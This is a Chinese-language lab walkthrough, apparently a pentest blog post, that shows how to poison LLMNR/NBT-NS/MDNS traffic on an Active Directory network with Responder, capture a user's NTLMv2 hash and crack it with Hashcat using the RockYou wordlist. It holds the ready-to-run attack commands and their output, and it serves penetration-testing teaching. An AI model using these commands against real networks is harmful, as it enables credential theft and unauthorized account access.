使用 Responder 捕获哈希值

Responder 是一个可用于对 活动目录 域执行 LLMNR 中毒 攻击的工具。 LLMNR 并不是响应者可以对其进行中毒攻击的唯一协议。它还可以用于 NBT-NSMDNS

用法示例

针对我们的 AD 实验室,我们将使用 Responder 来执行 LLMNR 中毒。这将使我们能够捕获从受害计算机发送的用于身份验证的哈希值。一旦我们有了哈希值,我们就可以破解它以获取该机器的密码。

随着我们的 AD 实验室启动并处于活动状态,我们将使用以下命令与响应者来攻击 域控制器

1
responder -I eth0 -dwP

使用的标志:

  • -I/ --interface:告诉响应者我们要使用哪个网络接口。
  • -d/ --DHCP:告诉响应者“也响应”DHCP 广播请求。
  • -w/ --wpad:启动恶意 WPAD 服务器(它将响应主机名解析请求)
  • -P/ --ProxyAuth:告诉响应程序强制 NTLM 身份验证(即使目标网络没有打开 WPAD)
  • 其他-v/ --verbose:将您已经捕获的哈希添加到输出中。
    打开这些标志,并且您的攻击框与域和域计算机位于“同一网络”上,输出应如下所示:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [ON]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [eth0]
    Responder IP               [10.0.2.4]
    Responder IPv6             [fe80::a00:27ff:fed8:d39f]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-06P8C35WKXO]
    Responder Domain Name      [SZWS.LOCAL]
    Responder DCE-RPC Port     [45001]

[+] Listening for events...

请注意,所有投毒者和服务器类型都应打开。如果您以前使用过 Responder,并更改了这些内容,请将它们改回来。响应程序现在侦听您的 eth0 接口以获取与所列协议相关的传入数据包。

强制一些流量

在真正的渗透测试中,在客户组织中的员工实际登录到他们的 AD 帐户之前,您可能不会看到任何流量。因此,为了在我们的实验室模拟中强制一些流量,我们可以登录到我们的常规域虚拟机之一。

来自启动主机的流量



这是我只需打开我的一个 AD 用户框(尚未以该用户身份登录)即可捕获的流量。此流量告诉我们有一个 MDNS(多播 DNS)请求解析主机名 TRASHCAN.local。我们的流氓服务器响应了一个有毒的答案(该答案被发送到我们启动的用户框)。

在文件系统中搜索IP

现在,如果我们转到用户虚拟机的文件资源管理器并搜索“攻击机器”的 IP,我们会在 Responder 中获得以下哈希值:


此屏幕截图显示了当 Dan Dumpster 在登录域计算机时搜索我们的攻击 IP 地址时,我们的恶意服务器收到的哈希值。现在我们有了哈希值(这是 DES 生成的哈希值),我们可以轻松破解它以获取 Dan Dumpster 的密码。

破解哈希

为了破解这个哈希,我们将使用 Hashcat。 Hashcat 是一个破解程序,理想地使用 GPU 处理来破解许多不同格式的哈希值。为了破解这个哈希值,我们将为 -m 标志指定值 5600。这告诉 hashcat 我们正在破解 NTLMv2 哈希。

要为 hashcat 提供哈希值,请将整个哈希值复制并粘贴到名为 hashes.txt 的文件中。哈希值包括用户名和密码,因此最后从 ddumpster::LANDFILL:......00000000 的所有内容(在我的示例中)。

一旦保存在文件中,我们使用 hashcat 的命令如下:

1
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt

我们还使用 RockYou wordlist,hashcat 将使用它来生成哈希值以尝试匹配我们正在寻找的哈希值。即使在虚拟机中,这个破解也只需要 hashcat 大约 16 秒:

现在我们可以以 Dan Dumpster 身份登录!

[!资源]